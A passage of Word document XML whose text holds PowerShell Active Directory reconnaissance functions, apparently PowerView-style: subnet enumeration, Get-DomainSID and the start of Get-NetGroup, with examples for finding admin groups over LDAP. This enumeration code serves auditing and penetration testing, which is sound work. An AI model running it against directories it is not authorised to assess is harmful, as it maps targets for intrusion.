    <w:p w14:paraId="66BDBC17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E5A250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F909660" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            New-Object -TypeName PSObject -Property $SubnetProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5CD5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33048FF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51134055" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A97DBA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2D9FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $SubnetSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A014820" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38DA93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66262945" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A1D3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10EA47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF89151" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEB9D01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2FB44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E9E399F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37153B0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-DomainSID {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486C3E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01164386" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E290D8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17F99199" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets the SID for the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C536270" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05F443F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF6BEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="443BB10C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103E650" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DA75371" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273901B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5103F0B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36ACDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F929B51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D1DAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D47AED1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        C:\&gt; Get-DomainSID -Domain TEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A5A47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6235FACE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns SID for the domain 'TEST'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE3A6B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777F0727" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F42531C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7B4167" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2988B2EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C453C3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0724B998" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F0AFFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C90D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C9131" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="570AFAF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DCSID = Get-NetComputer -Domain $Domain -DomainController $DomainController -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' | Select-Object -First 1 -ExpandProperty objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A9A5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($DCSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5810CA4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DCSID.Substring(0, $DCSID.LastIndexOf('-'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172E2174" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC61011" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C634D78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error extracting domain SID for $Domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FC0A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE61CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EA7926" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25365676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="309FB46D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function Get-NetGroup {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D97EFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E944AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC13BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="738DF54D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets a list of all current groups in a domain, or all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28087B4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the groups a given user/group object belongs to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686EAA82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78903B41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E1A62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7986FF7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The group name to query for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0428BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="799BBBB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C57C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B3F7B07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The group SID to query for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F954E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="36EFC267" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701C6EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A396651" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The user name (or group name) to query for all effective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716DA56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        groups of.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C2F5D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C5D7EAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0FF86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01E78143" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2956A90E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CA03D06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A521634" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A2A88A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for groups, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC95E9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="143F6EC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60887AB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6ED7A1F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CFCAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D26A6E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDDEA3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6270562A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA67CF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30143B23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="132D84C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER AdminCount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544BC90B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A6C8369" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return group with adminCount=1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA39DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D8AFB0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CDEFCC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4275494A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return full group objects instead of just object names (the default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889701B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B9E7594" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER RawSids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49118A54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40F49102" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return raw SIDs when using "Get-NetGroup -UserName X"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016BC110" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1DDA334B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE8BBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18734EDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4CF20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FAAAE81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F56754" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E89BA8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5FC60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6FCA36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DAD6391" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER AllTypes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1855F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63F6633A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        By default we will retrieve only Security, not Distribution Groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E49A07A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="699E648D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84555A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7BCB5F9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44202F67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21C757C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the current security groups in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EA968" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5135E541" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA8CCCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35C59450" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGroup -GroupName *admin*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7919B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23F9F1A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all groups with "admin" in their group name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B76CF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05DBA0B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B13850" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0ACA38DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGroup -Domain testing -FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF47465" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F21EEB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns full group data objects in the 'testing' domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF4915" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32336E5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A1DC76A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63782158" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A42648" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D4E8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B727B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1283AACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="603C7DAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE0B5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID,</w:t>
      </w:r>
    </w:p>
